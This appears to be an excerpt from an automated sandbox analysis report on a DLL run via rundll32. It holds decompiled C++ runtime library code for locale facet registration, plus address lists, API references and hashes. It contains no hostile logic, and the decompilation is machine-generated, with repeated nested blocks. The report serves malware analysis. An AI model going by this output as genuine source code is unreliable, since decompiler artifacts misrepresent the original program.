							E6E2200AC(0x6e2683cf, __ebx, _t266, _t273, 0x14);
							E6E206653(_t286 - 0x14, 0);
							_t274 =  *0x6e2c6e34; // 0x0
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6E1E161C(0x6e2c6e14);
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6E2066BA(_t286 - 0x14);
								return E6E220075(_t267);
							} else {
								__eflags = _t274;
								if(_t274 == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6E21C0B8(_t203, _t213, __edx, _t267, _t274) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t286 - 0x20);
										E6E223D74(_t286 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t203, _t267, _t274, 0x14);
										E6E206653(_t286 - 0x14, 0);
										_t275 =  *0x6e2c6e3c; // 0x0
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6E1E161C(0x6e2c6e1c);
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6E2066BA(_t286 - 0x14);
											return E6E220075(_t268);
										} else {
											__eflags = _t275;
											if(_t275 == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6E21C120(_t203, _t220, __edx, _t268, _t275) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t286 - 0x20);
													E6E223D74(_t286 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t203, _t268, _t275, 0x14);
													E6E206653(_t286 - 0x14, 0);
													_t276 =  *0x6e2c6e38; // 0x0
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6E1E161C(0x6e2c6e18);
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6E2066BA(_t286 - 0x14);
														return E6E220075(_t269);
													} else {
														__eflags = _t276;
														if(_t276 == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6E21C1A4(_t203, _t227, _t264, _t269, _t276) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t286 - 0x20);
																E6E223D74(_t286 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t203, _t269, _t276, 0x14);
																E6E206653(_t286 - 0x14, 0);
																_t277 =  *0x6e2c6e40; // 0x0
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6E1E161C(0x6e2c6e20);
																_t234 =  *((intOrPtr*)(_t286 + 8));
																_t270 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6E2066BA(_t286 - 0x14);
																	return E6E220075(_t270);
																} else {
																	__eflags = _t277;
																	if(_t277 == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6E21C229(_t203, _t234, _t264, _t270, _t277) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t286 - 0x20);
																			E6E223D74(_t286 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t203, _t270, _t277, 0x14);
																			E6E206653(_t286 - 0x14, 0);
																			_t278 =  *0x6e2c6e44; // 0x0
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6E1E161C(0x6e2c6e24);
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6E2066BA(_t286 - 0x14);
																				return E6E220075(_t271);
																			} else {
																				__eflags = _t278;
																				if(_t278 == 0) {
																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
																					__eflags = E6E21C295(_t203, _t241, _t264, _t271, _t278) - 0xffffffff;
																					if(__eflags == 0) {
																						_t245 = _t286 - 0x20;
																						E6E1E1438(_t245);
																						E6E223D74(_t286 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e26851f, _t203, _t271, _t278, 4);
																						_t279 = _t245;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
																						 *_t279 = 0x6e26c414;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6E21D028(_t203, _t245, _t264, _t271, _t279,  *_t91);
																						return E6E220075(_t279,  *((intOrPtr*)(_t286 + 8)));
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6E206FD3(__eflags, _t271);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6e2c6e44 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6E206FD3(__eflags, _t270);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6e2c6e40 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6E206FD3(__eflags, _t269);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6e2c6e38 = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6E206FD3(__eflags, _t268);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6e2c6e3c = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6E206FD3(__eflags, _t267);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6e2c6e34 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6E206FD3(__eflags, _t266);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6e2c6e30 = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}

0x6e21b898
0x6e21b898
0x6e21b89f
0x6e21b8a9
0x6e21b8ae
0x6e21b8b9
0x6e21b8bd
0x6e21b8c0
0x6e21b8c5
0x6e21b8c9
0x6e21b8ce
0x6e21b8d2
0x6e21b917
0x6e21b91a
0x6e21b926
0x6e21b8d4
0x6e21b8d6
0x6e21b8dc
0x6e21b8e2
0x6e21b8ea
0x6e21b8ed
0x6e21b92a
0x6e21b938
0x6e21b93d
0x6e21b945
0x6e21b94f
0x6e21b954
0x6e21b95f
0x6e21b963
0x6e21b966
0x6e21b96b
0x6e21b974
0x6e21b976
0x6e21b978
0x6e21b9bd
0x6e21b9c0
0x6e21b9cc
0x6e21b97a
0x6e21b97a
0x6e21b97c
0x6e21b982
0x6e21b988
0x6e21b990
0x6e21b993
0x6e21b9d0
0x6e21b9de
0x6e21b9e3
0x6e21b9eb
0x6e21b9f5
0x6e21b9fa
0x6e21ba05
0x6e21ba09
0x6e21ba0c
0x6e21ba11
0x6e21ba1a
0x6e21ba1c
0x6e21ba1e
0x6e21ba63
0x6e21ba66
0x6e21ba72
0x6e21ba20
0x6e21ba20
0x6e21ba22
0x6e21ba28
0x6e21ba2e
0x6e21ba36
0x6e21ba39
0x6e21ba76
0x6e21ba84
0x6e21ba89
0x6e21ba91
0x6e21ba9b
0x6e21baa0
0x6e21baab
0x6e21baaf
0x6e21bab2
0x6e21bab7
0x6e21bac0
0x6e21bac2
0x6e21bac4
0x6e21bb09
0x6e21bb0c
0x6e21bb18
0x6e21bac6
0x6e21bac6
0x6e21bac8
0x6e21bace
0x6e21bad4
0x6e21badc
0x6e21badf
0x6e21bb1c
0x6e21bb2a
0x6e21bb2f
0x6e21bb37
0x6e21bb41
0x6e21bb46
0x6e21bb51
0x6e21bb55
0x6e21bb58
0x6e21bb5d
0x6e21bb66
0x6e21bb68
0x6e21bb6a
0x6e21bbaf
0x6e21bbb2
0x6e21bbbe
0x6e21bb6c
0x6e21bb6c
0x6e21bb6e
0x6e21bb74
0x6e21bb7a
0x6e21bb82
0x6e21bb85
0x6e21bbc2
0x6e21bbd0
0x6e21bbd5
0x6e21bbdd
0x6e21bbe7
0x6e21bbec
0x6e21bbf7
0x6e21bbfb
0x6e21bbfe
0x6e21bc03
0x6e21bc0c
0x6e21bc0e
0x6e21bc10
0x6e21bc55
0x6e21bc58
0x6e21bc64
0x6e21bc12
0x6e21bc12
0x6e21bc14
0x6e21bc1a
0x6e21bc20
0x6e21bc28
0x6e21bc2b
0x6e21bc65
0x6e21bc68
0x6e21bc76
0x6e21bc7b
0x6e21bc83
0x6e21bc88
0x6e21bc8a
0x6e21bc90
0x6e21bc93
0x6e21bc9c
0x6e21bc9c
0x6e21bc9c
0x6e21bca0
0x6e21bca6
0x6e21bca9
0x6e21bcb5
0x6e21bc2d
0x6e21bc2d
0x6e21bc30
0x6e21bc34
0x6e21bc38
0x6e21bc45
0x6e21bc4d
0x6e21bc4f
0x00000000
0x6e21bc4f
0x6e21bc16
0x6e21bc16
0x00000000
0x6e21bc16
0x6e21bc14
0x6e21bb87
0x6e21bb87
0x6e21bb8a
0x6e21bb8e
0x6e21bb92
0x6e21bb9f
0x6e21bba7
0x6e21bba9
0x00000000
0x6e21bba9
0x6e21bb70
0x6e21bb70
0x00000000
0x6e21bb70
0x6e21bb6e
0x6e21bae1
0x6e21bae1
0x6e21bae4
0x6e21bae8
0x6e21baec
0x6e21baf9
0x6e21bb01
0x6e21bb03
0x00000000
0x6e21bb03
0x6e21baca
0x6e21baca
0x00000000
0x6e21baca
0x6e21bac8
0x6e21ba3b
0x6e21ba3b
0x6e21ba3e
0x6e21ba42
0x6e21ba46
0x6e21ba53
0x6e21ba5b
0x6e21ba5d
0x00000000
0x6e21ba5d
0x6e21ba24
0x6e21ba24
0x00000000
0x6e21ba24
0x6e21ba22
0x6e21b995
0x6e21b995
0x6e21b998
0x6e21b99c
0x6e21b9a0
0x6e21b9ad
0x6e21b9b5
0x6e21b9b7
0x00000000
0x6e21b9b7
0x6e21b97e
0x6e21b97e
0x00000000
0x6e21b97e
0x6e21b97c
0x6e21b8ef
0x6e21b8ef
0x6e21b8f2
0x6e21b8f6
0x6e21b8fa
0x6e21b907
0x6e21b90f
0x6e21b911
0x00000000
0x6e21b911
0x6e21b8d8
0x6e21b8d8
0x00000000
0x6e21b8d8
0x6e21b8d6

APIs

__EH_prolog3.LIBCMT ref: 6E21B89F
std::_Lockit::_Lockit.LIBCPMT ref: 6E21B8A9
int.LIBCPMT ref: 6E21B8C0

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E21B8FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B91A
__CxxThrowException@8.LIBVCRUNTIME ref: 6E21B938

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 5141e150c987f14687410213f946ae7ab3c68ea652f40b7dca6d7c74b60acb0f
Instruction ID: d08d6b302eae1b797f4fb565c8de8d8823559af4b1c173fd64c924e421521c79
Opcode Fuzzy Hash: 5141e150c987f14687410213f946ae7ab3c68ea652f40b7dca6d7c74b60acb0f
Instruction Fuzzy Hash: B811CE7991451ECBCF04DBE0C894AEDB7BBBF44B14F140919E510AB390DBB89E41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E21B93E, Relevance: 9.1, APIs: 6, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6E21B93E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t242 - 0x14, 0);
				_t231 =  *0x6e2c6e34; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6E1E161C(0x6e2c6e14);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6E2066BA(_t242 - 0x14);
					return E6E220075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6E21C0B8(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t242 - 0x20);
							E6E223D74(_t242 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t225, _t231, 0x14);
							E6E206653(_t242 - 0x14, 0);
							_t232 =  *0x6e2c6e3c; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6E1E161C(0x6e2c6e1c);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6E2066BA(_t242 - 0x14);
								return E6E220075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6E21C120(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t242 - 0x20);
										E6E223D74(_t242 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t172, _t226, _t232, 0x14);
										E6E206653(_t242 - 0x14, 0);
										_t233 =  *0x6e2c6e38; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6E1E161C(0x6e2c6e18);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6E2066BA(_t242 - 0x14);
											return E6E220075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6E21C1A4(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t242 - 0x20);
													E6E223D74(_t242 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t172, _t227, _t233, 0x14);
													E6E206653(_t242 - 0x14, 0);
													_t234 =  *0x6e2c6e40; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6E1E161C(0x6e2c6e20);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6E2066BA(_t242 - 0x14);
														return E6E220075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6E21C229(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t242 - 0x20);
																E6E223D74(_t242 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t172, _t228, _t234, 0x14);
																E6E206653(_t242 - 0x14, 0);
																_t235 =  *0x6e2c6e44; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6E1E161C(0x6e2c6e24);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6E2066BA(_t242 - 0x14);
																	return E6E220075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6E21C295(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6E1E1438(_t207);
																			E6E223D74(_t242 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e26851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6e26c414;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6E21D028(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6E220075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6E206FD3(__eflags, _t229);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6e2c6e44 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6E206FD3(__eflags, _t228);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6e2c6e40 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6E206FD3(__eflags, _t227);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6e2c6e38 = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6E206FD3(__eflags, _t226);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6e2c6e3c = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6E206FD3(__eflags, _t225);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6e2c6e34 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}

0x6e21b93e
0x6e21b93e
0x6e21b945
0x6e21b94f
0x6e21b954
0x6e21b95f
0x6e21b963
0x6e21b966
0x6e21b96b
0x6e21b96f
0x6e21b974
0x6e21b978
0x6e21b9bd
0x6e21b9c0
0x6e21b9cc
0x6e21b97a
0x6e21b97c
0x6e21b982
0x6e21b988
0x6e21b990
0x6e21b993
0x6e21b9d0
0x6e21b9de
0x6e21b9e3
0x6e21b9eb
0x6e21b9f5
0x6e21b9fa
0x6e21ba05
0x6e21ba09
0x6e21ba0c
0x6e21ba11
0x6e21ba1a
0x6e21ba1c
0x6e21ba1e
0x6e21ba63
0x6e21ba66
0x6e21ba72
0x6e21ba20
0x6e21ba20
0x6e21ba22
0x6e21ba28
0x6e21ba2e
0x6e21ba36
0x6e21ba39
0x6e21ba76
0x6e21ba84
0x6e21ba89
0x6e21ba91
0x6e21ba9b
0x6e21baa0
0x6e21baab
0x6e21baaf
0x6e21bab2
0x6e21bab7
0x6e21bac0
0x6e21bac2
0x6e21bac4
0x6e21bb09
0x6e21bb0c
0x6e21bb18
0x6e21bac6
0x6e21bac6
0x6e21bac8
0x6e21bace
0x6e21bad4
0x6e21badc
0x6e21badf
0x6e21bb1c
0x6e21bb2a
0x6e21bb2f
0x6e21bb37
0x6e21bb41
0x6e21bb46
0x6e21bb51
0x6e21bb55
0x6e21bb58
0x6e21bb5d
0x6e21bb66
0x6e21bb68
0x6e21bb6a
0x6e21bbaf
0x6e21bbb2
0x6e21bbbe
0x6e21bb6c
0x6e21bb6c
0x6e21bb6e
0x6e21bb74
0x6e21bb7a
0x6e21bb82
0x6e21bb85
0x6e21bbc2
0x6e21bbd0
0x6e21bbd5
0x6e21bbdd
0x6e21bbe7
0x6e21bbec
0x6e21bbf7
0x6e21bbfb
0x6e21bbfe
0x6e21bc03
0x6e21bc0c
0x6e21bc0e
0x6e21bc10
0x6e21bc55
0x6e21bc58
0x6e21bc64
0x6e21bc12
0x6e21bc12
0x6e21bc14
0x6e21bc1a
0x6e21bc20
0x6e21bc28
0x6e21bc2b
0x6e21bc65
0x6e21bc68
0x6e21bc76
0x6e21bc7b
0x6e21bc83
0x6e21bc88
0x6e21bc8a
0x6e21bc90
0x6e21bc93
0x6e21bc9c
0x6e21bc9c
0x6e21bc9c
0x6e21bca0
0x6e21bca6
0x6e21bca9
0x6e21bcb5
0x6e21bc2d
0x6e21bc2d
0x6e21bc30
0x6e21bc34
0x6e21bc38
0x6e21bc45
0x6e21bc4d
0x6e21bc4f
0x00000000
0x6e21bc4f
0x6e21bc16
0x6e21bc16
0x00000000
0x6e21bc16
0x6e21bc14
0x6e21bb87
0x6e21bb87
0x6e21bb8a
0x6e21bb8e
0x6e21bb92
0x6e21bb9f
0x6e21bba7
0x6e21bba9
0x00000000
0x6e21bba9
0x6e21bb70
0x6e21bb70
0x00000000
0x6e21bb70
0x6e21bb6e
0x6e21bae1
0x6e21bae1
0x6e21bae4
0x6e21bae8
0x6e21baec
0x6e21baf9
0x6e21bb01
0x6e21bb03
0x00000000
0x6e21bb03
0x6e21baca
0x6e21baca
0x00000000
0x6e21baca
0x6e21bac8
0x6e21ba3b
0x6e21ba3b
0x6e21ba3e
0x6e21ba42
0x6e21ba46
0x6e21ba53
0x6e21ba5b
0x6e21ba5d
0x00000000
0x6e21ba5d
0x6e21ba24
0x6e21ba24
0x00000000
0x6e21ba24
0x6e21ba22
0x6e21b995
0x6e21b995
0x6e21b998
0x6e21b99c
0x6e21b9a0
0x6e21b9ad
0x6e21b9b5
0x6e21b9b7
0x00000000
0x6e21b9b7
0x6e21b97e
0x6e21b97e
0x00000000
0x6e21b97e
0x6e21b97c

APIs

__EH_prolog3.LIBCMT ref: 6E21B945
std::_Lockit::_Lockit.LIBCPMT ref: 6E21B94F
int.LIBCPMT ref: 6E21B966

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E21B9A0
std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B9C0
__CxxThrowException@8.LIBVCRUNTIME ref: 6E21B9DE

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 12d9f1bb7d0f9f2ca665b1fbe3dd440f4633d0f2298e9e35950886ecf55a60fe
Instruction ID: b30431928973617535b6f04673bde7e034cd3064f742672db61ea0d389a179d7
Opcode Fuzzy Hash: 12d9f1bb7d0f9f2ca665b1fbe3dd440f4633d0f2298e9e35950886ecf55a60fe
Instruction Fuzzy Hash: 5F11BC7990451ECBCB04EBE0C894AEDB7BBBF44B14F140919E510AB390DBB49E45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F94B, Relevance: 9.1, APIs: 6, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6E20F94B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t245;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;

				_t264 = __edx;
				_t203 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t286 - 0x14, 0);
				_t273 =  *0x6e2c6ddc; // 0x0
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6E1E161C(0x6e2c6d88);
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6E2066BA(_t286 - 0x14);
					return E6E220075(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6E211409(__ebx, _t206, __edx, _t266, _t273) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t286 - 0x20);
							E6E223D74(_t286 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t266, _t273, 0x14);
							E6E206653(_t286 - 0x14, 0);
							_t274 =  *0x6e2c6de0; // 0x0
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6E1E161C(0x6e2c6d8c);
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6E2066BA(_t286 - 0x14);
								return E6E220075(_t267);
							} else {
								__eflags = _t274;
								if(_t274 == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6E211471(_t203, _t213, __edx, _t267, _t274) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t286 - 0x20);
										E6E223D74(_t286 - 0x20, 0x6e2c3504);
										asm("int3");
